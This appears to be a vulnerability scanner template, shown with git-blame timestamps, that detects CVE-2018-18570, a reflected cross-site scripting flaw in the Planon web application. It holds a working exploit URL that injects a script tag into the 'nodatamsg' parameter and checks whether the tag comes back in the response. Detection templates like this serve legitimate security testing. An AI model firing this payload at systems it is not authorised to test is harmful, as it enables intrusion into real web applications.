2021-11-03 06:06:30 +00:00
|
|
|
id: CVE-2018-18570
|
2022-04-22 10:38:41 +00:00
|
|
|
|
2021-11-03 06:06:30 +00:00
|
|
|
info:
|
|
|
|
name: Cross-Site Scripting on Planon web application
|
|
|
|
author: emadshanab
|
|
|
|
severity: medium
|
|
|
|
description: Planon before Live Build 41 has XSS
|
|
|
|
reference:
|
|
|
|
- https://www2.deloitte.com/de/de/pages/risk/articles/planon-cross-site-scripting.html
|
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-18570
|
2021-11-03 06:21:45 +00:00
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
2022-04-22 10:38:41 +00:00
|
|
|
cvss-score: 6.1
|
2021-11-03 06:21:45 +00:00
|
|
|
cve-id: CVE-2018-18570
|
|
|
|
cwe-id: CWE-79
|
2022-04-22 10:38:41 +00:00
|
|
|
tags: xss,cve,cve2018,planon
|
2021-11-03 06:06:30 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
|
|
|
- '{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "</script><script>alert(document.domain)</script>"
|
|
|
|
part: body
|
|
|
|
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "text/html"
|
|
|
|
part: header
|